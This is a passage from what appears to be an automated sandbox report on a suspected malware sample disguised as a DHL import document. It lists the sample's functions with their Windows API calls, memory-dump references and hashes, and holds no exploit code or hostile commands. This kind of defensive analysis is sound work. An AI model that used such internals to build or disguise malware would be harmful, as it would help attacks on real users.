                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                          • String ID:
                                                                                          • API String ID: 3191363074-0
                                                                                          • Opcode ID: 9bdf9be55b2e880b2b86adce5f6e971cf6a481bc6e4d808d29fc8431ba5d9e10
                                                                                          • Instruction ID: 1eef0b99a61d52a74a60a04fdfc7d779ea2821615e87fc99600fd0acd4873d8b
                                                                                          • Opcode Fuzzy Hash: 9bdf9be55b2e880b2b86adce5f6e971cf6a481bc6e4d808d29fc8431ba5d9e10
                                                                                          • Instruction Fuzzy Hash: EE317C71601209EFDB60DFA5C884AABBBFDFB14314B10442EF506D2201DBB8AE449B60
                                                                                          Function 00831901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowRect.USER32(?,?), ref: 00831915
                                                                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 008319C1
                                                                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 008319C9
                                                                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 008319DA
                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 008319E2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3382505437-0
                                                                                          • Opcode ID: 595175a7e1510984a45d84e33cdb19f69f6bf0bcbc7de3b95161e24b23c19142
                                                                                          • Instruction ID: 96290250ead829fdda8c80b5262d804e2e9dece0de48b46a2bd86cc1bc305324
                                                                                          • Opcode Fuzzy Hash: 595175a7e1510984a45d84e33cdb19f69f6bf0bcbc7de3b95161e24b23c19142
                                                                                          • Instruction Fuzzy Hash: 8B318C71A00219AFCB04CFA8C999BAE3BB5FB45715F504229F961E72D1C7B09954CB90
                                                                                          Function 00865706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00865745
                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0086579D
                                                                                          • _wcslen.LIBCMT ref: 008657AF
                                                                                          • _wcslen.LIBCMT ref: 008657BA
                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00865816
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 763830540-0
                                                                                          • Opcode ID: 38a5aa81f7189a9fe0211fae387d8ca230a0a4ef595d596c23c6c9da2385154c
                                                                                          • Instruction ID: b47482522c79b97125905bc87a323f167c7214f2307f8bdc7c1b348f01b45eb3
                                                                                          • Opcode Fuzzy Hash: 38a5aa81f7189a9fe0211fae387d8ca230a0a4ef595d596c23c6c9da2385154c
                                                                                          • Instruction Fuzzy Hash: D521B67190461CDADB208F60CC84AEE7BB8FF04724F118256F929EB280DB749985CF50
                                                                                          Function 007E990F Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSysColor.USER32(00000008), ref: 007E98CC
                                                                                          • SetTextColor.GDI32(?,?), ref: 007E98D6
                                                                                          • SetBkMode.GDI32(?,00000001), ref: 007E98E9
                                                                                          • GetStockObject.GDI32(00000005), ref: 007E98F1
                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 007E9952
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$LongModeObjectStockTextWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1860813098-0
                                                                                          • Opcode ID: 6eddec52540ae05a32eee16e056dd7ec444d00866516f95f8b8ee3c3bb5505de
                                                                                          • Instruction ID: bf8de58bf2b48a27cbf325c333f37efa6b1c1b5f438e338e3cddc7ee0a493e85
                                                                                          • Opcode Fuzzy Hash: 6eddec52540ae05a32eee16e056dd7ec444d00866516f95f8b8ee3c3bb5505de
                                                                                          • Instruction Fuzzy Hash: 8D2126724462D09FCB228F36EC58AE53FA0AF5B331F09019DE6928A1A2D77D5990CB50
                                                                                          Function 00850930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsWindow.USER32(00000000), ref: 00850951
                                                                                          • GetForegroundWindow.USER32 ref: 00850968
                                                                                          • GetDC.USER32(00000000), ref: 008509A4
                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 008509B0
                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 008509E8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                          • String ID:
                                                                                          • API String ID: 4156661090-0
                                                                                          • Opcode ID: 93e01f550b55d523f1487c698deaea09021a4f99817c26ccca3726e8444b4c98
                                                                                          • Instruction ID: 6ea83cb1a64d0a839caaa5c9ad13f3dc30082e7346128be0ff4ee43adf4f58bc
                                                                                          • Opcode Fuzzy Hash: 93e01f550b55d523f1487c698deaea09021a4f99817c26ccca3726e8444b4c98
                                                                                          • Instruction Fuzzy Hash: AE215E35A00204AFD704EF69D888AAEBBF5FF58701F05806DE84AD7352CA74AC44CB50
                                                                                          Function 0080CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0080CDC6
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0080CDE9
                                                                                            • Part of subcall function 00803820: RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0080CE0F
                                                                                          • _free.LIBCMT ref: 0080CE22
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0080CE31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                          • String ID:
                                                                                          • API String ID: 336800556-0
                                                                                          • Opcode ID: d763238c30efed94a8dc3c56f716537dc803184f71ad1bc49c3431777e63f43b
                                                                                          • Instruction ID: 37c45910c2738f3263cfdd9373546b5702ca26e6cd0eface0628250e15a3ac5f
                                                                                          • Opcode Fuzzy Hash: d763238c30efed94a8dc3c56f716537dc803184f71ad1bc49c3431777e63f43b
                                                                                          • Instruction Fuzzy Hash: AC0175726012157FA3611FBAEC4CD7B796DFEC6BA13150229FD05D6281DA618D0191B1
                                                                                          Function 007E9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007E9693
                                                                                          • SelectObject.GDI32(?,00000000), ref: 007E96A2
                                                                                          • BeginPath.GDI32(?), ref: 007E96B9
                                                                                          • SelectObject.GDI32(?,00000000), ref: 007E96E2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                          • String ID:
                                                                                          • API String ID: 3225163088-0
                                                                                          • Opcode ID: 9c466df31c6c10ee1fad4b28a591f207d3ebf9dc98f7f1f8b7e325ba4559d492
                                                                                          • Instruction ID: 9833b296457b68698884e5fc11e43f17470eedc70002feb1d20accab26943e7b
                                                                                          • Opcode Fuzzy Hash: 9c466df31c6c10ee1fad4b28a591f207d3ebf9dc98f7f1f8b7e325ba4559d492
                                                                                          • Instruction Fuzzy Hash: D8218032802385EBEF119F26EC1C7AA7FA8BB06355F540216F510A65B0D3B85992CB95
                                                                                          Function 00835711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memcmp
                                                                                          • String ID:
                                                                                          • API String ID: 2931989736-0
                                                                                          • Opcode ID: 32daae4a8f38b24596a3a3d1935de0e88f89d74e79f1276d14f84c87e6f5215d
                                                                                          • Instruction ID: 2bb5f47a2af9611ef6f6d840a73355d62b5926c004f850489156df8560c28762
                                                                                          • Opcode Fuzzy Hash: 32daae4a8f38b24596a3a3d1935de0e88f89d74e79f1276d14f84c87e6f5215d
                                                                                          • Instruction Fuzzy Hash: 4301926164561DFAD6085510AD82EBA635DFFA13A8F814020FE14DA342F668ED10C2E0
                                                                                          Function 00802DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,?,007FF2DE,00803863,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6), ref: 00802DFD
                                                                                          • _free.LIBCMT ref: 00802E32
                                                                                          • _free.LIBCMT ref: 00802E59
                                                                                          • SetLastError.KERNEL32(00000000,007D1129), ref: 00802E66
                                                                                          • SetLastError.KERNEL32(00000000,007D1129), ref: 00802E6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free
                                                                                          • String ID:
                                                                                          • API String ID: 3170660625-0
                                                                                          • Opcode ID: 4d8155609ae627cc2ca508cc7fcdc02d1f111d2e59b14760d5012c1125d3e448
                                                                                          • Instruction ID: e656eefbfb9a9ec63dec56660faadf4020310c36e474bf22c9bc39bdb22d004f
                                                                                          • Opcode Fuzzy Hash: 4d8155609ae627cc2ca508cc7fcdc02d1f111d2e59b14760d5012c1125d3e448
                                                                                          • Instruction Fuzzy Hash: 1B0128362856006BC6927738AC4ED2B2A5DFFD13B9B350029F965E23E3EFF48C014121
                                                                                          Function 0083000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?,?,0083035E), ref: 0083002B
                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830046
                                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830054
                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?), ref: 00830064
                                                                                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830070
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                          • String ID:
                                                                                          • API String ID: 3897988419-0
                                                                                          • Opcode ID: ba6f2b02e64848e0628e09b10413a46a5f66706316bad298ed33be47c807c383
                                                                                          • Instruction ID: 6f875fd63380c677171821aa7c090ec9124e575df0da376b115ffda4c67d79ed
                                                                                          • Opcode Fuzzy Hash: ba6f2b02e64848e0628e09b10413a46a5f66706316bad298ed33be47c807c383
                                                                                          • Instruction Fuzzy Hash: 2001DB72600608BFDB209F68DC54BAA7AADFB88792F118024F845D3210E7B4CD008BA0
                                                                                          Function 0083E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0083E997
                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 0083E9A5
                                                                                          • Sleep.KERNEL32(00000000), ref: 0083E9AD
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0083E9B7
                                                                                          • Sleep.KERNEL32 ref: 0083E9F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                          • String ID:
                                                                                          • API String ID: 2833360925-0
                                                                                          • Opcode ID: acab8a6654d5d8fedba8883e00bcfdf8ef716c92bd7488e84cd25d1882d402ec
                                                                                          • Instruction ID: a28746ea985f5f47e013a6f06d755426fd30c4aab0539cae8e4b11a6c6b7f0b6
                                                                                          • Opcode Fuzzy Hash: acab8a6654d5d8fedba8883e00bcfdf8ef716c92bd7488e84cd25d1882d402ec
                                                                                          • Instruction Fuzzy Hash: D2011331C0162DDBCF00ABE5DC59AEDBF78FF49702F010556E942F2281CB7096568BA2
                                                                                          Function 008310F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00831114
                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831120
                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 0083112F
                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831136
                                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0083114D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                          • String ID:
                                                                                          • API String ID: 842720411-0
                                                                                          • Opcode ID: 8327ab4b339cea44a116f872f39ea7836eec1a5f15710f73850b456159911540
                                                                                          • Instruction ID: 1e3d2e2acc5f935433016e66911858276e93d87e8a1d4a180067158f14f3349f
                                                                                          • Opcode Fuzzy Hash: 8327ab4b339cea44a116f872f39ea7836eec1a5f15710f73850b456159911540
                                                                                          • Instruction Fuzzy Hash: 8B011975200205BFDB114FA9DC4DAAA3B6EFF8A7A0F215419FA85D7360DA71DC009A60
                                                                                          Function 00830FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00830FCA
                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00830FD6
                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00830FE5
                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00830FEC
                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00831002
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                          • String ID:
                                                                                          • API String ID: 44706859-0
                                                                                          • Opcode ID: d5d6e08733232b4735d94fadb557b40ba00bd9552a015bca174b169741f17ea9
                                                                                          • Instruction ID: f604407330ebf52de8f568a9d5083e5b6d14931f4b65e337c0f859e595bad91c
                                                                                          • Opcode Fuzzy Hash: d5d6e08733232b4735d94fadb557b40ba00bd9552a015bca174b169741f17ea9
                                                                                          • Instruction Fuzzy Hash: 8FF06D35200701FBDB214FA5DC5DF663BADFF8AB62F125414FA89D7251CAB1DC408AA0
                                                                                          Function 00831014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0083102A
                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00831036
                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00831045
                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0083104C
                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00831062
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                          • String ID:
                                                                                          • API String ID: 44706859-0
                                                                                          • Opcode ID: 8b4b07f214f244b39b8d05c44db6e23f21e97425c33031d819aa46a40a1dc26c
                                                                                          • Instruction ID: 42520654d592c2eedeb3a557a78a404edcc7fa5b9923a441f8b959f5e789df00
                                                                                          • Opcode Fuzzy Hash: 8b4b07f214f244b39b8d05c44db6e23f21e97425c33031d819aa46a40a1dc26c
                                                                                          • Instruction Fuzzy Hash: A3F06D35200701FBDB219FA5EC5DF663BADFF8AB61F121414FA85D7250CAB5D8408AA0
                                                                                          Function 0084030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 00840324
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 00840331
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 0084033E
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 0084034B
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 00840358
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0084017D,?,008432FC,?,00000001,00812592,?), ref: 00840365
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
